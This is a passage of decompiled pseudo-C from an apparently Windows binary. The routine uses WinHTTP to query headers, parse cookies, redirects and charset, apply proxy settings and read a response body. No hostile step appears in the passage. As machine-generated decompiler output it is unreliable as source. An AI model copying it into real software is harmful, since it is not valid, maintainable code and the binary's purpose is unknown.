													if(_t843 == 0) {
														goto L207;
													} else {
														_t845 =  &_v4288;
														_v4288 = 0;
														__imp__WinHttpQueryHeaders(_t1349, 0x16, 0, 0, _t845, 0);
														__eflags = _t845;
														if(__eflags != 0) {
															L82:
															_t1309 = _v4288 * 2 >> 0x20;
															_t1365 = E00BF4B55(_v4288 * 2 >> 0x20, __eflags,  ~(0 | __eflags > 0x00000000) | _v4288 * 0x00000002);
															_v4308 = _t1365;
															E00BF71C0(_t1330, _t1365, 0, _v4288 + _v4288);
															_t1393 = _t1384 + 0x10;
															_t850 =  &_v4288;
															__imp__WinHttpQueryHeaders(_v4296, 0x16, 0, _t1365, _t850, 0);
															__eflags = _t850;
															if(_t850 == 0) {
																L143:
																E00BF44E1(_t1365);
																_t1349 = _v4296;
																_t1384 = _t1393 + 4;
																goto L144;
															} else {
																_t1207 = _t1365;
																_t162 = _t1207 + 2; // 0x2
																_t1322 = _t162;
																do {
																	_t936 =  *_t1207;
																	_t1207 = _t1207 + 2;
																	__eflags = _t936;
																} while (_t936 != 0);
																_t1373 =  &(_t1330[0xe]);
																_push(_t1207 - _t1322 >> 1);
																E00BE7B00(_t1062,  &(_t1330[0xe]), _t1322, _t1330, _v4308);
																_v4320 = 0;
																_v4316 = 0;
																_v4312 = 0;
																_v8 = 2;
																_push(0);
																_v4188 = 0;
																_v4184 = 7;
																_v4204 = 0;
																E00BE7B00(_t1062,  &_v4204, _t1322, _t1330, 0xc2685c);
																_v8 = 3;
																__eflags = _t1330[0x4b];
																if(_t1330[0x4b] == 0) {
																	_push(0x19);
																	_t1233 =  &_v4204;
																	E00BE7B00(_t1062, _t1233, _t1322, _t1330, L"charset={[A-Za-z0-9\\-_]+}");
																	_push(_t1233);
																	_t1007 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1233, _t1373,  &_v4320);
																	_t1393 = _t1393 + 0x10;
																	__eflags = _t1007;
																	if(_t1007 != 0) {
																		_t1322 = _v4320;
																		__eflags = (_v4316 - _t1322 >> 3) * 0xaaaaaaab;
																		if((_v4316 - _t1322 >> 3) * 0xaaaaaaab != 0) {
																			_t1235 =  &(_t1330[0x1a]);
																			__eflags =  &(_t1330[0x1a]) - _t1322;
																			if( &(_t1330[0x1a]) != _t1322) {
																				__eflags =  *((intOrPtr*)(_t1322 + 0x14)) - 8;
																				_t1012 = _t1322;
																				if( *((intOrPtr*)(_t1322 + 0x14)) >= 8) {
																					_t1012 =  *_t1322;
																				}
																				_push( *((intOrPtr*)(_t1322 + 0x10)));
																				E00BE7B00(_t1062, _t1235, _t1322, _t1330, _t1012);
																			}
																		}
																	}
																}
																_push(0x18);
																_t1212 =  &_v4204;
																E00BE7B00(_t1062, _t1212, _t1322, _t1330, L"Content-Length: {[0-9]+}");
																_push(_t1212);
																_t942 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1212, _t1373,  &_v4320);
																_t1400 = _t1393 + 0x10;
																__eflags = _t942;
																if(_t942 != 0) {
																	_t1232 = _v4320;
																	__eflags = (_v4316 - _t1232 >> 3) * 0xaaaaaaab;
																	if((_v4316 - _t1232 >> 3) * 0xaaaaaaab != 0) {
																		__eflags =  *((intOrPtr*)(_t1232 + 0x14)) - 8;
																		if( *((intOrPtr*)(_t1232 + 0x14)) >= 8) {
																			_t1232 =  *_t1232;
																		}
																		_t1004 = E00C00FCA(_t1232, _t1232);
																		_t1400 = _t1400 + 4;
																		_t1330[0x23] = _t1004;
																	}
																}
																_push(0x12);
																_t1214 =  &_v4204;
																E00BE7B00(_t1062, _t1214, _t1322, _t1330, L"Location: {[0-9]+}");
																_push(_t1214);
																_t945 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1214, _t1373,  &_v4320);
																_t1401 = _t1400 + 0x10;
																__eflags = _t945;
																if(_t945 != 0) {
																	_t1322 = _v4320;
																	__eflags = (_v4316 - _t1322 >> 3) * 0xaaaaaaab;
																	if((_v4316 - _t1322 >> 3) * 0xaaaaaaab != 0) {
																		_t1231 =  &(_t1330[0x58]);
																		__eflags =  &(_t1330[0x58]) - _t1322;
																		if( &(_t1330[0x58]) != _t1322) {
																			__eflags =  *((intOrPtr*)(_t1322 + 0x14)) - 8;
																			_t998 = _t1322;
																			if( *((intOrPtr*)(_t1322 + 0x14)) >= 8) {
																				_t998 =  *_t1322;
																			}
																			_push( *((intOrPtr*)(_t1322 + 0x10)));
																			E00BE7B00(_t1062, _t1231, _t1322, _t1330, _t998);
																		}
																	}
																}
																_push(0x15);
																_t1216 =  &_v4204;
																E00BE7B00(_t1062, _t1216, _t1322, _t1330, L"Set-Cookie:\\b*{.+?}\\n");
																_push(_t1216);
																_t948 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1216, _t1373,  &_v4320);
																_t1349 = _v4320;
																_t1393 = _t1401 + 0x10;
																_v4292 = _t1349;
																__eflags = _t948;
																if(_t948 == 0) {
																	L125:
																	_v8 = 2;
																	_t1309 = _v4184;
																	__eflags = _t1309 - 8;
																	if(_t1309 < 8) {
																		L129:
																		_v4188 = 0;
																		_v4184 = 7;
																		_v4204 = 0;
																		_v8 = 0;
																		__eflags = _t1349;
																		if(_t1349 == 0) {
																			L142:
																			_t1365 = _v4308;
																			goto L143;
																		} else {
																			__eflags = _t1349 - _v4316;
																			if(_t1349 == _v4316) {
																				L139:
																				_t954 = _t1349;
																				_t1219 = (_v4312 - _t1349 >> 3) * 0xaaaaaaab + (_v4312 - _t1349 >> 3) * 0xaaaaaaab * 2 << 3;
																				__eflags = _t1219 - 0x1000;
																				if(_t1219 < 0x1000) {
																					L141:
																					_push(_t1219);
																					E00BF4B47(_t1349);
																					_t1393 = _t1393 + 8;
																					_v4320 = 0;
																					_v4316 = 0;
																					_v4312 = 0;
																					goto L142;
																				} else {
																					_t1349 =  *(_t1349 - 4);
																					_t1085 = _t1219 + 0x23;
																					__eflags = _t954 - _t1349 + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L220;
																					} else {
																						goto L141;
																					}
																				}
																			} else {
																				_t1349 = _t1349 + 0x14;
																				__eflags = _t1349;
																				do {
																					_t1220 =  *_t1349;
																					__eflags = _t1220 - 8;
																					if(_t1220 < 8) {
																						goto L137;
																					} else {
																						_t960 =  *((intOrPtr*)(_t1349 - 0x14));
																						_t1221 = 2 + _t1220 * 2;
																						__eflags = _t1221 - 0x1000;
																						if(_t1221 < 0x1000) {
																							L136:
																							_push(_t1221);
																							E00BF4B47(_t960);
																							_t1393 = _t1393 + 8;
																							goto L137;
																						} else {
																							_t1250 =  *((intOrPtr*)(_t960 - 4));
																							_t1085 = _t1221 + 0x23;
																							__eflags = _t960 - _t1250 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L220;
																							} else {
																								_t960 = _t1250;
																								goto L136;
																							}
																						}
																					}
																					goto L338;
																					L137:
																					 *(_t1349 - 4) = 0;
																					 *((short*)(_t1349 - 0x14)) = 0;
																					 *_t1349 = 7;
																					_t1349 = _t1349 + 0x18;
																					__eflags = _t1349 - 0x14 - _v4316;
																				} while (_t1349 - 0x14 != _v4316);
																				_t1349 = _v4292;
																				goto L139;
																			}
																		}
																	} else {
																		_t1222 = _v4204;
																		_t1309 = 2 + _t1309 * 2;
																		_t964 = _t1222;
																		__eflags = _t1309 - 0x1000;
																		if(_t1309 < 0x1000) {
																			L128:
																			_push(_t1309);
																			E00BF4B47(_t1222);
																			_t1393 = _t1393 + 8;
																			goto L129;
																		} else {
																			_t1085 =  *((intOrPtr*)(_t1222 - 4));
																			_t1250 = _t1309 + 0x23;
																			__eflags = _t964 -  *((intOrPtr*)(_t1222 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L220;
																			} else {
																				goto L128;
																			}
																		}
																	}
																} else {
																	_t971 = (_v4316 - _t1349 >> 3) * 0xaaaaaaab;
																	__eflags = _t971;
																	if(_t971 == 0) {
																		goto L125;
																	} else {
																		_t1223 =  &(_t1330[0x24]);
																		_v4304 = 0;
																		_v4280 =  &(_t1330[0x24]);
																		_t1348 = _t971;
																		do {
																			__eflags =  *(_t1349 + 0x14) - 8;
																			_t972 = _t1349;
																			if( *(_t1349 + 0x14) >= 8) {
																				_t972 =  *_t1349;
																			}
																			_push( *((intOrPtr*)(_t1349 + 0x10)));
																			E00BE8930(_t1062, _t1223, _t972);
																			__eflags = _v4304 - _t1348 - 1;
																			if(_v4304 != _t1348 - 1) {
																				_push(2);
																				E00BE8930(_t1062, _v4280, L"; ");
																			}
																			_t1349 = _t1349 + 0x18;
																			_t1223 = _v4280;
																			_t976 = _v4304 + 1;
																			_v4304 = _t976;
																			__eflags = _t976 - _t1348;
																		} while (_t976 < _t1348);
																		_t1330 = _v4348;
																		_push(1);
																		_v4236 = 0;
																		_v4232 = 7;
																		_v4252 = 0;
																		E00BE7B00(_t1062,  &_v4252, _t1322, _t1330, " ");
																		_v8 = 4;
																		_t1349 =  &(_t1330[0x24]);
																		_t980 = E00BD4830(_t1062,  &_v4276, _t1349, _t1330,  &_v4252);
																		_t1393 = _t1393 + 4;
																		E00BE5D00(_t1062, _t1349, _t980);
																		_t1324 = _v4256;
																		__eflags = _t1324 - 8;
																		if(_t1324 < 8) {
																			L115:
																			_v8 = 3;
																			_t1325 = _v4232;
																			_v4260 = 0;
																			_v4256 = 7;
																			_v4276 = 0;
																			__eflags = _t1325 - 8;
																			if(_t1325 < 8) {
																				L119:
																				_t1326 = _t1330[0x28];
																				__eflags = _t1326;
																				if(_t1326 != 0) {
																					__eflags =  *(_t1349 + 0x14) - 8;
																					_t983 = _t1349;
																					if( *(_t1349 + 0x14) >= 8) {
																						_t983 =  *_t1349;
																					}
																					__eflags =  *((short*)(_t983 + _t1326 * 2 - 2)) - 0x3b;
																					if( *((short*)(_t983 + _t1326 * 2 - 2)) != 0x3b) {
																						_push(1);
																						E00BE8930(_t1062, _t1349, ";");
																					}
																				}
																				_t1349 = _v4292;
																				goto L125;
																			} else {
																				_t1228 = _v4252;
																				_t1327 = 2 + _t1325 * 2;
																				_t985 = _t1228;
																				__eflags = _t1327 - 0x1000;
																				if(_t1327 < 0x1000) {
																					L118:
																					_push(_t1327);
																					E00BF4B47(_t1228);
																					_t1393 = _t1393 + 8;
																					goto L119;
																				} else {
																					_t1085 =  *((intOrPtr*)(_t1228 - 4));
																					_t1250 = _t1327 + 0x23;
																					__eflags = _t985 -  *((intOrPtr*)(_t1228 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L220;
																					} else {
																						goto L118;
																					}
																				}
																			}
																		} else {
																			_t1229 = _v4276;
																			_t1328 = 2 + _t1324 * 2;
																			_t989 = _t1229;
																			__eflags = _t1328 - 0x1000;
																			if(_t1328 < 0x1000) {
																				L114:
																				_push(_t1328);
																				E00BF4B47(_t1229);
																				_t1393 = _t1393 + 8;
																				goto L115;
																			} else {
																				_t1085 =  *((intOrPtr*)(_t1229 - 4));
																				_t1250 = _t1328 + 0x23;
																				__eflags = _t989 -  *((intOrPtr*)(_t1229 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L220;
																				} else {
																					goto L114;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															__eflags = GetLastError() - 0x7a;
															if(__eflags != 0) {
																L144:
																_t852 =  &_v4288;
																_v4288 = 0;
																__imp__WinHttpQueryHeaders(_t1349, 0x13, 0, 0, _t852, 0);
																__eflags = _t852;
																if(__eflags != 0) {
																	L146:
																	_t1309 = _v4288 * 2 >> 0x20;
																	_t1366 = E00BF4B55(_v4288 * 2 >> 0x20, __eflags,  ~(0 | __eflags > 0x00000000) | _v4288 * 0x00000002);
																	E00BF71C0(_t1330, _t1366, 0, _v4288 + _v4288);
																	_t1394 = _t1384 + 0x10;
																	_t857 =  &_v4288;
																	__imp__WinHttpQueryHeaders(_v4296, 0x13, 0, _t1366, _t857, 0);
																	__eflags = _t857;
																	if(_t857 != 0) {
																		_t1203 = _t1366;
																		_t285 = _t1203 + 2; // 0x2
																		_t1309 = _t285;
																		do {
																			_t933 =  *_t1203;
																			_t1203 = _t1203 + 2;
																			__eflags = _t933;
																		} while (_t933 != 0);
																		_t1204 = _t1203 - _t1309;
																		__eflags = _t1204;
																		_push(_t1204 >> 1);
																		E00BE7B00(_t1062,  &(_t1330[0x3f]), _t1309, _t1330, _t1366);
																	}
																	E00BF44E1(_t1366);
																	_t1384 = _t1394 + 4;
																} else {
																	__eflags = GetLastError() - 0x7a;
																	if(__eflags == 0) {
																		goto L146;
																	}
																}
																_t859 = _t1330[0x20];
																_t1367 = 0;
																_v4304 = 0;
																_v4308 = 0x2800;
																__eflags = _t1330[0x20];
																if(__eflags != 0) {
																	E00BF44E1(_t859);
																	_t1384 = _t1384 + 4;
																	_t1330[0x20] = 0;
																}
																_t1330[0x20] = E00BF4B55(_t1309, __eflags, 0x2800);
																E00BF71C0(_t1330, _t860, 0, 0x2800);
																_t1395 = _t1384 + 0x10;
																asm("o16 nop [eax+eax]");
																do {
																	_t862 =  &_v4288;
																	_v4288 = 0;
																	__imp__WinHttpQueryDataAvailable(_v4296, _t862);
																	__eflags = _t862;
																	if(_t862 == 0) {
																		_t1330[0x3e] = GetLastError();
																	} else {
																		_t1311 = _t1330[0x22];
																		__eflags = _t1311;
																		if(__eflags != 0) {
																			_t1199 = _t1330[0x23];
																			__eflags = _t1199;
																			if(__eflags != 0) {
																				asm("movd xmm1, esi");
																				asm("cvtdq2pd xmm1, xmm1");
																				asm("movd xmm0, ecx");
																				asm("addsd xmm1, [eax*8+0xc285c0]");
																				asm("cvtdq2pd xmm0, xmm0");
																				__eflags = _t1199 >> 0x1f;
																				asm("mulsd xmm1, [0xc28560]");
																				asm("addsd xmm0, [ecx*8+0xc285c0]");
																				asm("divsd xmm1, xmm0");
																				asm("movsd [esp], xmm1");
																				 *_t1311();
																				_t1395 = _t1395 - 8 + 8;
																			}
																		}
																		_v4280 = E00BF4B55(_t1311, __eflags, _v4288 + 1);
																		E00BF71C0(_t1330, _t917, 0, _v4288 + 1);
																		_t1396 = _t1395 + 0x10;
																		_v4292 = 0;
																		_t919 =  &_v4292;
																		__imp__WinHttpReadData(_v4296, _v4280, _v4288, _t919);
																		__eflags = _t919;
																		if(_t919 != 0) {
																			_t1201 = _v4292;
																			_t1320 = _v4308;
																			__eflags = _t1201 + _t1367 - _t1320;
																			if(_t1201 + _t1367 > _t1320) {
																				_t1321 = _t1320 + _t1320;
																				__eflags = _t1321;
																				_v4308 = _t1321;
																				_t1330[0x20] = E00BF4B55(_t1321, _t1321, _t1321);
																				E00BF71C0(_t1330, _t925, 0, _v4308);
																				E00BF73D0(_t1330[0x20], _t1330[0x20], _v4304);
																				E00BF44E1(_t1330[0x20]);
																				_t1201 = _v4292;
																				_t1396 = _t1396 + 0x20;
																				_t1367 = _v4304;
																			}
																			E00BF73D0( &(_t1330[0x20][_t1367]), _v4280, _t1201);
																			_t1396 = _t1396 + 0xc;
																			_t1367 = _t1367 + _v4292;
																			__eflags = _t1367;
																			_v4304 = _t1367;
																		}
																		E00BF44E1(_v4280);
																		_t1395 = _t1396 + 4;
																	}
																	__eflags = _v4288;
																} while (_v4288 > 0);
																_t1312 = _t1330[0x22];
																__eflags = _t1312;
																if(_t1312 != 0) {
																	_t1197 = _t1330[0x23];
																	__eflags = _t1197;
																	if(_t1197 != 0) {
																		asm("movd xmm1, esi");
																		asm("cvtdq2pd xmm1, xmm1");
																		asm("movd xmm0, ecx");
																		asm("addsd xmm1, [eax*8+0xc285c0]");
																		asm("cvtdq2pd xmm0, xmm0");
																		__eflags = _t1197 >> 0x1f;
																		asm("mulsd xmm1, [0xc28560]");
																		asm("addsd xmm0, [ecx*8+0xc285c0]");
																		asm("divsd xmm1, xmm0");
																		asm("movsd [esp], xmm1");
																		 *_t1312();
																		_t1395 = _t1395 - 8 + 8;
																	}
																}
																_t1330[0x21] = _t1367;
																_t864 =  &(_t1330[0x1a]);
																_t1368 = 0;
																_v4292 = 1;
																__eflags = _t864[5] - 8;
																_v4280 = 0;
																if(_t864[5] >= 8) {
																	_t864 =  *_t864;
																}
																_t865 = E00C01F2F(_t1062, _t1330, _t1368, _t864, L"utf-8", 5);
																_t1384 = _t1395 + 0xc;
																__eflags = _t865;
																if(_t865 == 0) {
																	_t1368 = 0xfde9;
																	_v4292 = _t865;
																	_v4280 = 0xfde9;
																}
																_t1369 = MultiByteToWideChar(_t1368, _v4292, _t1330[0x20], _t1330[0x21] + 1, 0, 0);
																__eflags = _t1369;
																if(__eflags > 0) {
																	L174:
																	_v4344 = E00BF4B55(_t1369 * 2 >> 0x20, __eflags,  ~(0 | __eflags > 0x00000000) | _t1369 * 0x00000002);
																	E00BF71C0(_t1330, _t871, 0, _t1369 + _t1369);
																	_t1397 = _t1384 + 0x10;
																	_t1370 = _v4344;
																	_t873 = MultiByteToWideChar(_v4280, _v4292, _t1330[0x20], _t1330[0x21] + 1, _t1370, _t1369);
																	__eflags = _t873;
																	if(_t873 > 0) {
																		_t1193 = _t1370;
																		_t1319 =  &(_t1193[1]);
																		do {
																			_t907 =  *_t1193;
																			_t1193 =  &(_t1193[1]);
																			__eflags = _t907;
																		} while (_t907 != 0);
																		_t1194 = _t1193 - _t1319;
																		__eflags = _t1194;
																		_push(_t1194 >> 1);
																		E00BE7B00(_t1062,  &(_t1330[0x14]), _t1319, _t1330, _t1370);
																	}
																	E00BF44E1(_t1370);
																	_t1384 = _t1397 + 4;
																} else {
																	_v4280 = 0;
																	_v4292 = 1;
																	_t1369 = MultiByteToWideChar(0, 1, _t1330[0x20], _t1330[0x21] + 1, 0, 0);
																	__eflags = _t1369;
																	if(__eflags > 0) {
																		goto L174;
																	}
																}
																__eflags = _v4208 - 8;
																_v4297 = 1;
																_t1184 =  >=  ? _v4228 :  &_v4228;
																__eflags = _v4212 - 3;
																if(_v4212 != 3) {
																	L209:
																	_t1349 = _v4296;
																	goto L210;
																} else {
																	_t1371 = 3;
																	_t1315 = L"GET";
																	while(1) {
																		__eflags =  *_t1184 -  *_t1315;
																		if( *_t1184 !=  *_t1315) {
																			goto L209;
																		}
																		_t1184 = _t1184 + 2;
																		_t1315 = _t1315 + 2;
																		_t1371 = _t1371 - 1;
																		__eflags = _t1371;
																		if(_t1371 != 0) {
																			continue;
																		} else {
																			_push(8);
																			_v4188 = _t1371;
																			_t1185 =  &_v4204;
																			_v4184 = 7;
																			_v4204 = 0;
																			E00BE7B00(_t1062, _t1185, _t1315, _t1330, L"{<html>}");
																			_v4332 = _t1371;
																			_v4328 = _t1371;
																			_v4324 = _t1371;
																			_push(_t1185);
																			_v8 = 6;
																			_t1349 =  &(_t1330[0x14]);
																			_t879 = E00BD4300(_t1062,  &_v4204, _t1330, _t1349, _t1185, _t1349,  &_v4332);
																			_t1187 = _v4332;
																			_t1384 = _t1384 + 0x10;
																			_t1316 = _v4328;
																			_v4280 = _t1187;
																			__eflags = _t879;
																			if(_t879 != 0) {
																				__eflags = (_t1316 - _t1187 >> 3) * 0xaaaaaaab;
																				if((_t1316 - _t1187 >> 3) * 0xaaaaaaab != 0) {
																					_push(9);
																					_t1191 =  &_v4204;
																					E00BE7B00(_t1062, _t1191, _t1316, _t1330, L"{</html>}");
																					_push(_t1191);
																					_t904 = E00BD4300(_t1062,  &_v4204, _t1330, _t1349, _t1191, _t1349,  &_v4332);
																					_t1187 = _v4332;
																					_t1384 = _t1384 + 0x10;
																					_t1316 = _v4328;
																					_v4280 = _t1187;
																					__eflags = _t904;
																					if(_t904 == 0) {
																						L187:
																						_t1330[0x3e] = 0xd;
																						_v4297 = 0;
																					} else {
																						__eflags = _t1316 == _t1187;
																						if(_t1316 == _t1187) {
																							goto L187;
																						}
																					}
																				}
																			}
																			_v8 = 5;
																			__eflags = _t1187;
																			if(_t1187 == 0) {
																				L201:
																				_v8 = 0;
																				_t1307 = _v4184;
																				__eflags = _t1307 - 8;
																				if(_t1307 < 8) {
																					L205:
																					__eflags = _v4297;
																					_t1349 = _v4296;
																					if(_v4297 != 0) {
																						L210:
																						__imp__WinHttpCloseHandle(_t1349);
																						goto L211;
																					} else {
																						_t1158 = _v4336;
																						goto L22;
																					}
																				} else {
																					_t1188 = _v4204;
																					_t1307 = 2 + _t1307 * 2;
																					_t880 = _t1188;
																					__eflags = _t1307 - 0x1000;
																					if(_t1307 < 0x1000) {
																						L204:
																						_push(_t1307);
																						E00BF4B47(_t1188);
																						_t1384 = _t1384 + 8;
																						goto L205;
																					} else {
																						_t1085 =  *((intOrPtr*)(_t1188 - 4));
																						_t1250 = _t1307 + 0x23;
																						__eflags = _t880 -  *((intOrPtr*)(_t1188 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L220;
																						} else {
																							goto L204;
																						}
																					}
																				}
																			} else {
																				__eflags = _t1187 - _t1316;
																				if(_t1187 == _t1316) {
																					L198:
																					_t888 = _t1187;
																					_t1318 = (_v4324 - _t1187 >> 3) * 0xaaaaaaab + (_v4324 - _t1187 >> 3) * 0xaaaaaaab * 2 << 3;
																					__eflags = _t1318 - 0x1000;
																					if(_t1318 < 0x1000) {
																						L200:
																						_push(_t1318);
																						E00BF4B47(_t1187);
																						_t1384 = _t1384 + 8;
																						_v4332 = 0;
																						_v4328 = 0;
																						_v4324 = 0;
																						goto L201;
																					} else {
																						_t1085 =  *((intOrPtr*)(_t1187 - 4));
																						_t1250 = _t1318 + 0x23;
																						__eflags = _t888 -  *((intOrPtr*)(_t1187 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L220;
																						} else {
																							goto L200;
																						}
																					}
																				} else {
																					_t1349 = _t1187 + 0x14;
																					do {
																						_t1189 =  *_t1349;
																						__eflags = _t1189 - 8;
																						if(_t1189 < 8) {
																							goto L196;
																						} else {
																							_t894 =  *((intOrPtr*)(_t1349 - 0x14));
																							_t1190 = 2 + _t1189 * 2;
																							__eflags = _t1190 - 0x1000;
																							if(_t1190 < 0x1000) {
																								L195:
																								_push(_t1190);
																								E00BF4B47(_t894);
																								_t1316 = _v4328;
																								_t1384 = _t1384 + 8;
																								goto L196;
																							} else {
																								_t1250 =  *((intOrPtr*)(_t894 - 4));
																								_t1085 = _t1190 + 0x23;
																								__eflags = _t894 - _t1250 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L220;
																								} else {
																									_t894 = _t1250;
																									goto L195;
																								}
																							}
																						}
																						goto L338;
																						L196:
																						 *(_t1349 - 4) = 0;
																						 *((short*)(_t1349 - 0x14)) = 0;
																						 *_t1349 = 7;
																						_t1349 = _t1349 + 0x18;
																						__eflags = _t1349 - 0x14 - _t1316;
																					} while (_t1349 - 0x14 != _t1316);
																					_t1187 = _v4280;
																					goto L198;
																				}
																			}
																		}
																		goto L338;
																	}
																	goto L209;
																}
															} else {
																goto L82;
															}
														}
													}
												} else {
													_t1015 =  &_v4196;
													asm("xorps xmm0, xmm0");
													asm("movups [ebp-0x1060], xmm0");
													__imp__WinHttpGetIEProxyConfigForCurrentUser(_t1015);
													__eflags = _t1015;
													if(_t1015 == 0) {
														L207:
														_t844 = GetLastError();
														_t1158 = _v4336;
														_t1330[0x3e] = _t844;
														continue;
													} else {
														_t1016 = _v4192;
														__eflags = _t1016;
														if(_t1016 == 0) {
															_t1374 = _v4188;
															__eflags = _t1374;
															if(_t1374 != 0) {
																_v4376 = 3;
																asm("xorps xmm0, xmm0");
																asm("movlpd [ebp-0x1110], xmm0");
																E00BF71C0(_t1330,  &_v540, 0, 0x208);
																E00C00FED( &_v540, 0x104, _t1374);
																_t1375 = _v4184;
																_t1384 = _t1384 + 0x18;
																_v4372 =  &_v540;
																__eflags = _t1375;
																if(_t1375 != 0) {
																	E00BF71C0(_t1330,  &_v1580, 0, 0x208);
																	E00C00FED( &_v1580, 0x104, _t1375);
																	_t1384 = _t1384 + 0x18;
																	_v4368 =  &_v1580;
																}
																_t1024 =  &_v4376;
																__imp__WinHttpSetOption(_v4296, 0x26, _t1024, 0xc);
																__eflags = _t1024;
																if(_t1024 == 0) {
																	goto L68;
																}
																goto L69;
															}
														} else {
															__eflags = _t1330[7] - 8;
															asm("xorps xmm0, xmm0");
															_v4404 = _t1016;
															_t1035 =  &(_t1330[2]);
															_v4412 = 3;
															_v4408 = 1;
															_v4392 = 1;
															_v4396 = 0;
															_v4400 = 0;
															asm("movq [ebp-0x1108], xmm0");
															_v4356 = 0;
															if(_t1330[7] >= 8) {
																_t1035 = _t1330[2];
															}
															__imp__WinHttpGetProxyForUrl( *_t1330, _t1035,  &_v4412,  &_v4364);
															__eflags = _t1035;
															if(_t1035 == 0) {
																L68:
																_t1330[0x3e] = GetLastError();
															} else {
																_t1036 =  &_v4364;
																__imp__WinHttpSetOption(_t1349, 0x26, _t1036, 0xc);
																__eflags = _t1036;
																if(_t1036 != 0) {
																	__imp__WinHttpSendRequest(_t1349, 0, 0, 0, 0, 0, 0);
																	__eflags = _t1036;
																	_t1241 =  !=  ? 1 : _v4340 & 0x000000ff;
																	_v4340 =  !=  ? 1 : _v4340 & 0x000000ff;
																}
																_t1037 = _v4360;
																__eflags = _t1037;
																if(_t1037 != 0) {
																	GlobalFree(_t1037);
																}
																_t1038 = _v4356;
																__eflags = _t1038;
																if(_t1038 != 0) {
																	GlobalFree(_t1038);
																}
															}
															L69:
															_t1025 = _v4192;
															__eflags = _t1025;
															if(_t1025 != 0) {
																GlobalFree(_t1025);
															}
															_t1026 = _v4188;
															__eflags = _t1026;
															if(_t1026 != 0) {
																GlobalFree(_t1026);
															}
														}
														_t1017 = _v4184;
														__eflags = _t1017;
														if(_t1017 != 0) {
															GlobalFree(_t1017);
														}
														__eflags = _v4340;
														_t1349 = _v4296;
														_t1158 = _v4336;
														if(_v4340 == 0) {
															continue;
														} else {
															goto L76;
														}
													}
												}
											} else {
												_push(8);
												_v4188 = 0;
												_v4184 = 7;
												_v4204 = 0;
												E00BE7B00(_t1062,  &_v4204, _t1307, _t1330, L"Cookie: ");
												_v8 = 1;
												_t1245 =  &(_t1330[0x2a]);
												__eflags = _t1330[0x2f] - 8;
												if(_t1330[0x2f] >= 8) {
													_t1245 = _t1330[0x2a];
												}
												E00BE8930(_t1062,  &_v4204, _t1245);
												__eflags = _v4184 - 8;
												_t842 =  >=  ? _v4204 :  &_v4204;
												__imp__WinHttpAddRequestHeaders(_t1349, _t842, _v4188, 0x1000000, _t1330[0x2e]);
												__eflags = _t842;
												if(_t842 == 0) {
													_t842 = GetLastError();
													_t1330[0x3e] = _t842;
												}
												_v8 = 0;
												_t1307 = _v4184;
												__eflags = _t1307 - 8;
												if(_t1307 < 8) {
													goto L37;
												} else {
													_t1247 = _v4204;
													_t1307 = 2 + _t1307 * 2;
													_t1056 = _t1247;
													__eflags = _t1307 - 0x1000;
													if(_t1307 < 0x1000) {
														L36:
														_push(_t1307);
														_t842 = E00BF4B47(_t1247);
														_t1384 = _t1384 + 8;
														goto L37;
													} else {
														_t1085 =  *((intOrPtr*)(_t1247 - 4));
														_t1250 = _t1307 + 0x23;
														__eflags = _t1056 -  *((intOrPtr*)(_t1247 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L220;
														} else {
															goto L36;
														}
													}
												}
											}
											goto L338;
										}
										_v4281 = 0;
										goto L210;
									}
								}
							}
						} else {
							__eflags = _t1330[0x4a] - 8;
							_t1060 =  &(_t1330[0x45]);
							if(_t1330[0x4a] >= 8) {
								_t1060 =  *_t1060;
							}
							__imp__WinHttpOpen(_t1060, 0, 0, 0, 0);
							 *_t1330 = _t1060;
							__eflags = _t1060;
							if(_t1060 != 0) {
								goto L11;
							} else {
								_t693 = GetLastError();
								L213:
								_t1330[0x3e] = _t693;
								_v4281 = 0;
								L214:
								_t1249 = _v4208;
								__eflags = _t1249 - 8;
								if(_t1249 < 8) {
									L218:
									goto L219;
								} else {
									_t1085 = _v4228;
									_t1250 = 2 + _t1249 * 2;
									_t696 = _t1085;
									__eflags = _t1250 - 0x1000;
									if(_t1250 < 0x1000) {
										L217:
										_push(_t1250);
										E00BF4B47(_t1085);
										goto L218;
									} else {
										_t1085 =  *((intOrPtr*)(_t1085 - 4));
										_t1250 = _t1250 + 0x23;
										__eflags = _t696 - _t1085 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											L220:
											E00C01351(_t1062, _t1085, _t1250, _t1330, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t1378);
											_t1379 = _t1384;
											_push(0xffffffff);
											_push(0xc16f0d);
											_push( *[fs:0x0]);
											_t1386 = _t1384 - 0x30;
											_t702 =  *0xc2e00c; // 0x5cb9e59c
											_t703 = _t702 ^ _t1379;
											_v48 = _t703;
											_push(_t1062);
											_push(_t1349);
											_push(_t1330);
											_push(_t703);
											 *[fs:0x0] =  &_v44;
											_t1351 = _v24;
											_v88 = _t1351;
											_v92 = _t1351;
											_v36 = 0;
											_t1332 = _v4;
											_t1251 = 0xf0f0f0f1 * _t1332 >> 0x20;
											_t1064 = _t1251 >> 8;
											_v84 = _t1064;
											__eflags = _t1332 != _t1064 * 0x110;
											if(_t1332 != _t1064 * 0x110) {
												_t1064 = _t1064 + 1;
												__eflags = _t1064;
												_v60 = _t1064;
											}
											_t1088 = _t1351;
											_push(0);
											E00BE6060(_t1064, _t1088, _t1251, _t1332 - (_t1064 << 4));
											_t1334 = _a4;
											_t711 = 0;
											_v52 = 0;
											__eflags = _t1064;
											if(_t1064 <= 0) {
												_t1065 = _a24;
											} else {
												_t1295 = _t1064 - 1;
												_v44 = 0;
												_t1065 = _a24;
												_t1138 = 0;
